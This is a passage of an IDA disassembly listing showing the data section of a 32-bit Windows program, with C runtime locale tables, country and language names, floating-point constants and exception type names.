dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_453DF0 dd 1 ; DATA XREF: sub_41DF10+4E�r
; sub_41E610:loc_41E616�r ...
byte_453DF4 db 2Eh ; DATA XREF: sub_429E90:loc_42AD17�r
; sub_429E90+ED2�r ...
align 4
dword_453DF8 dd 1 ; DATA XREF: sub_4342F0+169�w
; sub_4342F0+296�w
off_453DFC dd offset aNull_0 ; DATA XREF: sub_427F60:loc_4283A2�r
; sub_427F60+57C�r
; "(null)"
off_453E00 dd offset aNull ; DATA XREF: sub_427F60+514�r
; "(null)"
dword_453E04 dd 3 ; DATA XREF: sub_428E00+F�w
; sub_428E00+14�r ...
byte_453E08 db 1 ; DATA XREF: sub_4290B0+12F�r
db 2, 4, 8
align 10h
dword_453E10 dd 3A4h ; DATA XREF: sub_4290B0+7E�r
word_453E14 dw 8260h ; DATA XREF: sub_4290B0+192�r
dw 8279h
dd 21h, 0
dword_453E20 dd 0DFA6h ; DATA XREF: sub_4290B0+D5�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_453F00 dd 1 ; DATA XREF: sub_4299F0+2C�r
dword_453F04 dd 16h ; DATA XREF: sub_4299F0+3D�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_454068 dd 0D2D0920h, 5Dh ; DATA XREF: sub_429E90:loc_42A2B2�o
dword_454070 dd 5Dh, 0 ; DATA XREF: sub_429E90:loc_42A28D�o
dword_454078 dd 14h ; DATA XREF: sub_42BF40+1F�r
off_45407C dd offset aExp ; DATA XREF: sub_42BF40+2E�r
; "exp"
dd 1Dh, 43D2E4h, 1Ah, 43D2E0h, 1Bh, 43D2D8h, 1Fh, 43D2D0h
dd 13h, 43D2C8h, 21h, 43D2C0h, 0Eh, 43D2B8h, 0Dh, 43D2B0h
dd 0Fh, 43D2A8h, 10h, 43D2A0h, 5, 43D298h, 1Eh, 43D294h
dd 12h, 43D290h, 20h, 43D28Ch, 0Ch, 43D284h, 0Bh, 43D27Ch
dd 15h, 43D274h, 1Ch, 43D26Ch, 19h, 43D264h, 11h, 43D25Ch
dd 18h, 43D254h, 16h, 43D24Ch, 17h, 43D244h, 22h, 43D240h
dd 23h, 43D23Ch, 24h, 43D238h
dbl_454150 dq 1.797693134862316e308 ; DATA XREF: sub_42BAE0+E4�r
; sub_42BAE0:loc_42BBD7�r ...
dd 0
dd 0FFF80000h
dbl_454160 dq 1.797693134862316e308 ; DATA XREF: sub_42BAE0:loc_42BC1A�r
; sub_42BAE0+167�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_454178 dt 2.3562723457267347066e313 ; DATA XREF: sub_42C330+13�r
; sub_42C330+2A�r
align 4
tbyte_454184 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_42C330+41�r
align 10h
off_454190 dd offset sub_42CB20 ; DATA XREF: sub_420170+3�w
; sub_427F60+6AD�r
off_454194 dd offset sub_42C530 ; DATA XREF: sub_420170+D�w
; sub_427F60+6F1�r
off_454198 dd offset sub_42C640 ; DATA XREF: sub_420170+17�w
; sub_429E90+1138�r
off_45419C dd offset sub_42C480 ; DATA XREF: sub_420170+21�w
; sub_427F60+6CF�r
off_4541A0 dd offset sub_42C610 ; DATA XREF: sub_420170+2B�w
off_4541A4 dd offset sub_42CB20 ; DATA XREF: sub_420170+35�w
dd offset sub_432EE0
align 10h
off_4541B0 dd offset sub_42D860 ; DATA XREF: sub_42D910+2D�r
; sub_42D910+3D�r
dword_4541B4 dd 43h ; DATA XREF: sub_42DE80:loc_42DFEC�o
; _2:004542D0�o ...
dword_4541B8 dd 43h, 20h dup(0) ; DATA XREF: sub_42E120+8D�o
; sub_42E120+117�o ...
dword_45423C dd 43h, 20h dup(0) ; DATA XREF: sub_42E120+74�o
; sub_42E120+FC�o ...
off_4542C0 dd offset aLc_all ; DATA XREF: _0:0042DC0F�r _0:0042DC28�r ...
; "LC_ALL"
dword_4542C4 dd 0 ; DATA XREF: _0:0042DB07�r _0:0042DDB0�r ...
off_4542C8 dd offset sub_42E2B0 ; DATA XREF: sub_42DE80+12B�r
dd offset aLc_collate ; "LC_COLLATE"
dd offset dword_4541B4
dd offset sub_434E20
dd offset aLc_ctype ; "LC_CTYPE"
off_4542DC dd offset dword_4541B4 ; DATA XREF: sub_42E020+F0�r
dd offset sub_434A80
dd offset aLc_monetary ; "LC_MONETARY"
dd offset dword_4541B4
dd offset sub_434620
dd offset aLc_numeric ; "LC_NUMERIC"
dd offset dword_4541B4
dd offset sub_4342F0
dd offset aLc_time ; "LC_TIME"
dd offset dword_4541B4
dd offset sub_433970
dword_454308 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_428EC0+6�o
; _0:0042904E�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_454380 dd 3 ; DATA XREF: sub_42EFB0+98�r
; sub_42EFB0:loc_42F05B�r ...
dword_454384 dd 7 ; DATA XREF: sub_42EFB0+B1�r
; sub_4307E0+17D�r
dword_454388 dd 78h ; DATA XREF: _0:00430658�r _0:00430676�r
dword_45438C dd 0Ah ; DATA XREF: sub_42F170+1D�r
; sub_42F170:loc_42F1A2�r ...
dword_454390 dd 0FFFFFFFFh, 0A00h, 8 dup(0) ; DATA XREF: sub_427100:loc_427256�o
; sub_427CE0:loc_427ED9�o
dword_4543B8 dd 2 ; DATA XREF: sub_42FF30+2A�r
; sub_42FF30+3D�r ...
off_4543BC dd offset aR6002FloatingP ; DATA XREF: sub_42FF30+56�r
; sub_42FF30+98�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 43D694h, 9, 43D668h, 0Ah, 43D644h, 10h, 43D618h
dd 11h, 43D5E8h, 12h, 43D5C4h, 13h, 43D598h, 18h, 43D560h
dd 19h, 43D538h, 1Ah, 43D500h, 1Bh, 43D4C8h, 1Ch, 43D4A0h
dd 78h, 43D490h, 79h, 43D480h, 7Ah, 43D470h, 0FCh, 43D46Ch
dd 0FFh, 43D45Ch, 2 dup(0)
dword_454450 dd 2694h ; DATA XREF: sub_42B3B0+3�r
; _0:0042B41F�r ...
align 8
dword_454458 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_432A20+3�o
dword_454470 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_432A40+3�o
dword_454488 dd 7080h ; DATA XREF: sub_42D9A0+92�r
; sub_433090+80�w ...
dword_45448C dd 1 ; DATA XREF: sub_42D9A0+C2�r
; sub_433090+BF�w ...
dword_454490 dd 0FFFFF1F0h ; DATA XREF: sub_42D9A0+DE�r
; sub_433090+D7�w ...
dword_454494 dd 545350h, 0Fh dup(0) ; DATA XREF: _2:off_454514�o
dword_4544D4 dd 544450h, 0Fh dup(0) ; DATA XREF: _2:off_454518�o
off_454514 dd offset dword_454494 ; DATA XREF: sub_433090+FA�r
; sub_433090+123�r ...
off_454518 dd offset dword_4544D4 ; DATA XREF: sub_433090+140�r
; sub_433090+16A�r ...
align 10h
dword_454520 dd 0FFFFFFFFh ; DATA XREF: sub_433090+30�w
; sub_433470+1A�r ...
dword_454524 dd 0 ; DATA XREF: sub_433470:loc_43366B�r
; sub_433470+20F�r ...
dword_454528 dd 0 ; DATA XREF: sub_433470+2CF�r
; sub_433770+13D�w
align 10h
dword_454530 dd 0FFFFFFFFh ; DATA XREF: sub_433090+21�w
; sub_433090+2B�r ...
dword_454534 dd 0 ; DATA XREF: sub_433470+201�r
; sub_433470+21D�r ...
dword_454538 dd 0 ; DATA XREF: sub_433470+2E5�r
; sub_433770+1D�r ...
dword_45453C dd 0FFFFFFFFh ; DATA XREF: sub_433770+B0�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_45456C dd 16Dh ; DATA XREF: sub_42D9A0+2E�r
; sub_433770+2C�r ...
dword_454570 dd 0FFFFFFFFh ; DATA XREF: sub_433770+BF�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 3 dup(0)
dword_4545B0 dd 40Ah ; DATA XREF: sub_4359D0+3E�r
; sub_4359D0+147�r
a040a db '040a',0 ; DATA XREF: sub_4359D0+9A�o
align 4
off_4545BC dd offset aSpanishTraditi ; DATA XREF: sub_4359D0+AB�r
; "Spanish - Traditional Sort"
off_4545C0 dd offset loc_505345 ; DATA XREF: sub_4359D0+BC�o
off_4545C4 dd offset aSpain ; DATA XREF: sub_4359D0+CD�r
; "Spain"
off_4545C8 dd offset loc_505345 ; DATA XREF: sub_4359D0+DE�o
dword_4545CC dd 303538h, 0 ; DATA XREF: sub_4359D0+EF�o
a1252 db '1252',0 ; DATA XREF: sub_4359D0+100�o
align 4
dd 40Bh, 62303430h, 0
dd offset aFinnish ; "Finnish"
dd offset word_4E4946
dd offset aFinland ; "Finland"
dd offset word_4E4946
dd 303538h, 0
a1252_0 db '1252',0
align 4
dd 40Ch, 63303430h, 0
dd offset aFrench ; "French"
dd offset loc_415246
dd offset aFrance ; "France"
dd offset loc_415246
dd 303538h, 0
a1252_1 db '1252',0
align 4
dd 40Fh, 66303430h, 0
dd offset aIcelandic ; "Icelandic"
dd offset byte_4C5349
dd offset aIceland ; "Iceland"
dd offset byte_4C5349
dd 303538h, 0
a1252_2 db '1252',0
align 10h
dd 41Dh, 64313430h, 0
dd offset aSwedish ; "Swedish"
dd offset byte_455653
dd offset aSweden ; "Sweden"
dd offset byte_455753
dd 303538h, 0
a1252_3 db '1252',0
align 4
dd 42Dh, 64323430h, 0
dd offset aBasque ; "Basque"
dd offset byte_515545
dd offset aSpain ; "Spain"
dd offset loc_505345
dd 303538h, 0
a1252_4 db '1252',0
align 4
db 0Ah
db 8,0
align 4
a080a db '080a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4D5345
dd offset aMexico ; "Mexico"
dd 58454Dh, 303538h, 0
a1252_5 db '1252',0
align 4
dd 80Ch, 63303830h, 0
dd offset aFrench ; "French"
dd offset loc_425244+2
dd offset aBelgium ; "Belgium"
dd offset word_4C4542
dd 303538h, 0
a1252_6 db '1252',0
align 10h
dd 0C07h, 37306330h, 0
dd offset aGerman ; "German"
dd offset loc_414542+2
dd offset aAustria ; "Austria"
dd 545541h, 303538h, 0
a1252_7 db '1252',0
align 4
dd 0C09h, 39306330h, 0
dd offset aEnglish ; "English"
dd offset loc_414E40+5
dd offset aAustralia ; "Australia"
dd 535541h, 303538h, 0
a1252_8 db '1252',0
align 4
dd 0C0Ah, 61306330h, 0
dd offset aSpanishModernS ; "Spanish - Modern Sort"
dd offset byte_4E5345
dd offset aSpain ; "Spain"
dd offset loc_505345
dd 303538h, 0
a1252_9 db '1252',0
align 4
dd 0C0Ch, 63306330h, 0
dd offset aFrench ; "French"
dd offset loc_435240+6
dd offset aCanada ; "Canada"
dd offset byte_4E4143
dd 303538h, 0
a1252_10 db '1252',0
align 10h
dd 100Ah, 61303031h, 0
dd offset aSpanish ; "Spanish"
dd offset byte_475345
dd offset aGuatemala ; "Guatemala"
dd offset byte_4D5447
dd 303538h, 0
a1252_11 db '1252',0
align 4
dd 100Ch, 63303031h, 0
dd offset aFrench ; "French"
dd 535246h, 43D8DCh, 454843h, 303538h, 0
a1252_12 db '1252',0
align 4
dd 140Ah, 61303431h, 0
dd offset aSpanish ; "Spanish"
dd offset loc_435343+2
dd offset aCostaRica ; "Costa Rica"
dd offset byte_495243
dd 303538h, 0
a1252_13 db '1252',0
align 4
dd 140Ch, 63303431h, 0
dd offset aFrench ; "French"
dd offset word_4C5246
dd offset aLuxembourg ; "Luxembourg"
dd 58554Ch, 303538h, 0
a1252_14 db '1252',0
align 10h
dd 180Ah, 61303831h, 0
dd offset aSpanish ; "Spanish"
dd offset loc_41533E+7
dd offset aPanama ; "Panama"
dd offset dword_4E4150
dd 303538h, 0
a1252_15 db '1252',0
align 4
dd 1C09h, 39306331h, 0
dd offset aEnglish ; "English"
dd 534E45h, 43D8ACh, 46415Ah, 373334h, 0
a1252_16 db '1252',0
align 4
dd 1C0Ah, 61306331h, 0
dd offset aSpanish ; "Spanish"
dd offset aHallowell+1
dd offset aDominicanRepub ; "Dominican Republic"
dd offset dword_4D4F44
dd 303538h, 0
a1252_17 db '1252',0
align 4
db 0Ah
db ' ',0
align 4
a200a db '200a',0
align 10h
dd offset aSpanish ; "Spanish"
dd 565345h, 43D88Ch, 4E4556h, 303538h, 0
a1252_18 db '1252',0
align 10h
db 0Ah
db '$',0
align 4
a240a db '240a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset off_4F5344+1
dd offset aColombia ; "Colombia"
dd offset byte_4C4F43
dd 303538h, 0
a1252_19 db '1252',0
align 4
db 0Ah
db '(',0
align 10h
a280a db '280a',0
align 4
dd offset aSpanish ; "Spanish"
dd 525345h, 43D878h, 524550h, 303538h, 0
a1252_20 db '1252',0
align 4
db 0Ah
db ',',0
align 4
a2c0a db '2c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 535345h, 43D86Ch, 475241h, 303538h, 0
a1252_21 db '1252',0
align 4
a0_0 db 0Ah
db '0',0
align 4
a300a db '300a',0
align 10h
dd offset aSpanish ; "Spanish"
dd offset byte_465345
dd offset aEcuador ; "Ecuador"
dd 554345h, 303538h, 0
a1252_22 db '1252',0
align 10h
a4 db 0Ah
db '4',0
align 4
a340a db '340a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4C5345
dd offset aChile ; "Chile"
dd offset byte_4C4843
dd 303538h, 0
a1252_23 db '1252',0
align 4
a8 db 0Ah
db '8',0
align 10h
a380a db '380a',0
align 4
dd offset aSpanish ; "Spanish"
dd 595345h, 43D854h, 595255h, 303538h, 0
a1252_24 db '1252',0
align 4
db 0Ah
db '<',0
align 4
a3c0a db '3c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 5A5345h, 43D848h, 595250h, 303538h, 0
a1252_25 db '1252',0
align 4
word_454A54 dw 0C0Ch, 0C1Ah, 1007h, 436h, 80Ch, 42Dh, 403h, 100Ch
; DATA XREF: sub_4358A0+34�r
dw 810h, 81Dh
off_454A68 dd offset aAmerica ; DATA XREF: sub_434EB0+9C�o
; "america"
dd offset loc_415355
dd offset aBritain ; "britain"
dd 524247h, 43DA9Ch, 4E4843h, 43DA94h, 455A43h, 43DA8Ch
dd 524247h, 43DA7Ch, 524247h, 43DA74h, 444C4Eh, 43DA68h
dd 474B48h, 43DA5Ch, 4C5A4Eh, 43DA58h, 4C5A4Eh, 43DA4Ch
dd 4E4843h, 43DA40h, 4E4843h, 43DA34h, 495250h, 43DA2Ch
dd 4B5653h, 43DA1Ch, 46415Ah, 43DA10h, 524F4Bh, 43DA00h
dd 46415Ah, 43D9F4h, 524F4Bh, 43D9E0h, 4F5454h, 43DABCh
dd 524247h, 43D9D0h, 524247h, 43D9C0h, 415355h, 43DAB8h
dd 415355h
off_454B20 dd offset aAmerican ; DATA XREF: sub_434EB0+67�o
; "american"
dd 554E45h, 43DEA8h, 554E45h, 43DE94h, 554E45h, 43DE88h
dd 414E45h, 43DE80h, 424C4Eh, 43DE74h, 434E45h, 43DE70h
dd 48485Ah, 43DE6Ch, 49485Ah, 43DE64h, 534843h, 43DE50h
dd 48485Ah, 43DE3Ch, 534843h, 43DE28h, 49485Ah, 43DE14h
dd 544843h, 43DE04h, 424C4Eh, 43DDF0h, 554E45h, 43DDE4h
dd 414E45h, 43DDD4h, 4C4E45h, 43DDC8h, 434E45h, 43DDB4h
dd 424E45h, 43DDA8h, 494E45h, 43DD98h, 4A4E45h, 43DD8Ch
dd 5A4E45h, 43DD74h, 534E45h, 43DD58h, 544E45h, 43DD4Ch
dd 474E45h, 43DD40h, 554E45h, 43DD34h, 554E45h, 43DD24h
dd 425246h, 43DD14h, 435246h, 43DD00h, 4C5246h, 43DCF0h
dd 535246h, 43DCE0h, 414544h, 43DCCCh, 434544h, 43DCB8h
dd 4C4544h, 43DCA8h, 534544h, 43DC98h, 494E45h, 43DC88h
dd 535449h, 43DC7Ch, 524F4Eh, 43DC68h, 524F4Eh, 43DC54h
dd 4E4F4Eh, 43DC3Ch, 425450h, 43DC28h, 535345h, 43DC18h
dd 425345h, 43DC08h, 4C5345h, 43DBF4h, 4F5345h, 43DBE0h
dd 435345h, 43DBC4h, 445345h, 43DBB4h, 465345h, 43DBA0h
dd 455345h, 43DB8Ch, 475345h, 43DB78h, 485345h, 43DB68h
dd 4D5345h, 43DB58h, 4E5345h, 43DB44h, 495345h, 43DB34h
dd 415345h, 43DB20h, 5A5345h, 43DB10h, 525345h, 43DAFCh
dd 555345h, 43DAECh, 595345h, 43DAD8h, 565345h, 43DAC8h
dd 465653h, 43DAC0h, 534544h, 43DABCh, 474E45h, 43DAB8h
dd 554E45h, 43DAB4h, 554E45h
off_454D28 dd offset off_454D30 ; DATA XREF: sub_433970+70�w
; sub_433970:loc_433A11�w ...
align 10h
off_454D30 dd offset aSun ; DATA XREF: sub_433970:loc_433A11�o
; _2:off_454D28�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
; ---------------------------------------------------------------------------
mov ah, 0DFh
inc ebx
add [eax-53FFBC21h], dh
loc_454D85: ; CODE XREF: _2:00454DA4�j
fild word ptr [ebx+0]
test al, 0DFh
inc ebx
add [edi+ebx*8-205FFFBDh], ah
inc ebx
add [edi+ebx*8-206BFFBDh], bl
inc ebx
add [eax-7FFFBC21h], cl
fild word ptr [ebx+0]
js short loc_454D85
inc ebx
add [eax+700043DFh], bh
fild word ptr [ebx+0]
push 600043DFh
fild word ptr [ebx+0]
push esp
fild word ptr [ebx+0]
dec esp
fild word ptr [ebx+0]
inc eax
fild word ptr [ebx+0]
xor al, 0DFh
inc ebx
add [eax], dh
fild word ptr [ebx+0]
sub al, 0DFh
inc ebx
add [edi+ebx*8], ah
inc ebx
add [eax], dl
fild word ptr [ebx+0]
or bh, bl
inc ebx
; ---------------------------------------------------------------------------
db 0
align 10h
dword_454DE0 dd 2Eh, 0 ; DATA XREF: sub_4342F0+EE�o
; _2:off_454DE8�o
off_454DE8 dd offset dword_454DE0 ; DATA XREF: sub_434620+D4�w
; sub_434620+F6�o ...
off_454DEC dd offset dword_4F3684 ; DATA XREF: sub_434620+E2�w
off_454DF0 dd offset dword_4F3684 ; DATA XREF: sub_434620+F1�w
dd offset dword_4F3684
dd offset dword_4F3684
dd offset dword_4F3684
dd offset dword_4F3684
dd offset dword_4F3684
dd offset dword_4F3684
dd offset dword_4F3684
dd 2 dup(7F7F7F7Fh)
off_454E18 dd offset off_454DE8 ; DATA XREF: sub_4342F0:loc_4343D9�r
; sub_4342F0+F8�r ...
align 10h
dword_454E20 dd 2 dup(0) ; DATA XREF: sub_4395B0+6�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_454F80 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4395B0+2A�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
off_4550E0 dd offset off_43E17C ; DATA XREF: _1:0043E2E4�o _1:0043E3E4�o
align 8
a_?avexception@ db '.?AVexception@@',0
off_4550F8 dd offset off_43E17C ; DATA XREF: _1:off_43E1D0�o
; _1:0043E214�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_455118 dd offset off_43E17C ; DATA XREF: _1:off_43E220�o
; _1:0043E264�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_455138 dd offset off_43E17C ; DATA XREF: _1:off_43E270�o
; _1:0043E2B4�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_455158 dd offset off_43E17C ; DATA XREF: _1:off_43E2F0�o
; _1:0043E32C�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset sub_432EE0
align 8
dword_455178 dd 0 ; DATA XREF: sub_401300+C8�o
dword_45517C dd 0 ; DATA XREF: sub_401300+62�o
dword_455180 dd 0 ; DATA XREF: sub_401404+37D�o
; sub_401C87+AC7�o ...
dd 5 dup(0)
dword_455198 dd 0 ; DATA XREF: sub_401C87+B23�r
; sub_415944+60�r
dd 12Dh dup(0)
db 3 dup(0)
byte_455653 db 0 ; DATA XREF: _2:00454670�o
dd 3Fh dup(0)
db 3 dup(0)
byte_455753 db 0 ; DATA XREF: _2:00454678�o
dd 16Bh dup(0)
dword_455D00 dd 0 ; DATA XREF: sub_401C87+5F1B�r
; sub_401C87+601D�r ...
dd 7Fh dup(0)
dword_455F00 dd 0 ; DATA XREF: sub_40B691+4C�w
; sub_40B7CC+3A�w ...
dword_455F04 dd 0 ; DATA XREF: sub_40B691+3E�w
; sub_40B7CC+40�w ...
dword_455F08 dd 0 ; DATA XREF: sub_40B691+45�w
; sub_40B7CC+34�r ...
dword_455F0C dd 0 ; DATA XREF: sub_401300+C�r
; sub_4019A5+B9�w ...
dword_455F10 dd 0 ; DATA XREF: sub_40B7CC+6F�r
; sub_40B9A7+2A�w ...
dword_455F14 dd 0 ; DATA XREF: sub_401404+3C9�w
; sub_401404+441�w ...
byte_455F18 db 0 ; DATA XREF: sub_4019A5+91�o
; sub_401C87+5E63�r ...
align 4
dd 549h dup(0)
db 0
byte_457441 db 3 dup(0) ; DATA XREF: _2:off_44F17C�o
dd 22EFh dup(0)
dword_460000 dd 14D1h dup(0) ; DATA XREF: _5:00500B4C�o
db 0
byte_465345 db 3 dup(0) ; DATA XREF: _2:004549B4�o
dd 3FFFh dup(0)
db 0
byte_475345 db 3 dup(0) ; DATA XREF: _2:004547D0�o
dd 7FBEh dup(0)
db 3 dup(0)
byte_495243 db 0 ; DATA XREF: _2:00454830�o
dd 8000h dup(0)
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: _2:off_44F310�o
dd 3CBEh dup(0)
db 2 dup(0)
word_4C4542 dw 0 ; DATA XREF: _2:004546FC�o
dd 0BFh dup(0)
db 3 dup(0)
byte_4C4843 db 0 ; DATA XREF: _2:004549E8�o
dd 1BFh dup(0)
db 3 dup(0)
byte_4C4F43 db 0 ; DATA XREF: _2:00454938�o
dd 0C0h dup(0)
db 2 dup(0)
word_4C5246 dw 0 ; DATA XREF: _2:00454854�o
dd 3Fh dup(0)
db 0
byte_4C5345 db 3 dup(0) ; DATA XREF: _2:004549E0�o
db 0
byte_4C5349 db 3 dup(0) ; DATA XREF: _2:00454644�o _2:0045464C�o
dd 3B81h dup(0)
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: _2:off_44EA20�o
dd 37Ch dup(0)
dword_4D4F44 dd 100h dup(0) ; DATA XREF: _2:004548E0�o
db 0
byte_4D5345 db 3 dup(0) ; DATA XREF: _2:004546C8�o
dd 3Fh dup(0)
db 3 dup(0)
byte_4D5447 db 0 ; DATA XREF: _2:004547D8�o
dd 362Eh dup(0)
dword_4E2D00 dd 0D25Ah ; DATA XREF: sub_401300+FD�w
; sub_40B691+13�o ...
dword_4E2D04 dd 1Ch ; DATA XREF: sub_401404+3D�w
; sub_401C87:loc_40465F�r ...
dword_4E2D08 dd 0 ; DATA XREF: sub_401404:loc_4018CD�o
dword_4E2D0C dd 20h dup(0) ; DATA XREF: sub_401404+480�o
; sub_401404+50D�o ...
dword_4E2D8C dd 10h dup(0) ; DATA XREF: sub_401404+496�o
dword_4E2DCC dd 24h dup(0) ; DATA XREF: sub_401404+4AD�o
dword_4E2E5C dd 0 ; DATA XREF: sub_401404+4A1�w
; sub_401404+524�w ...
dword_4E2E60 dd 0 ; DATA XREF: sub_401404+4BD�w
dd 2 dup(0)
byte_4E2E6C db 0 ; DATA XREF: sub_401B0B+28�r
; sub_401B0B+30�o
byte_4E2E6D db 3 dup(0) ; DATA XREF: _2:0043F810�o
dword_4E2E70 dd 0 ; DATA XREF: sub_401404+4CE�w
; sub_401404+4E2�r ...
dword_4E2E74 dd 0 ; DATA XREF: sub_401404+485�w
; sub_401C87+86F�r
byte_4E2E78 db 0 ; DATA XREF: sub_401404+23E�o
byte_4E2E79 db 0 ; DATA XREF: sub_401C87+1E9C�o
byte_4E2E7A db 0 ; DATA XREF: sub_401C87+22C8�o
byte_4E2E7B db 0 ; DATA XREF: sub_401C87+40A8�o
byte_4E2E7C db 0 ; DATA XREF: sub_401C87+41F6�o
byte_4E2E7D db 0 ; DATA XREF: sub_401C87+447C�o
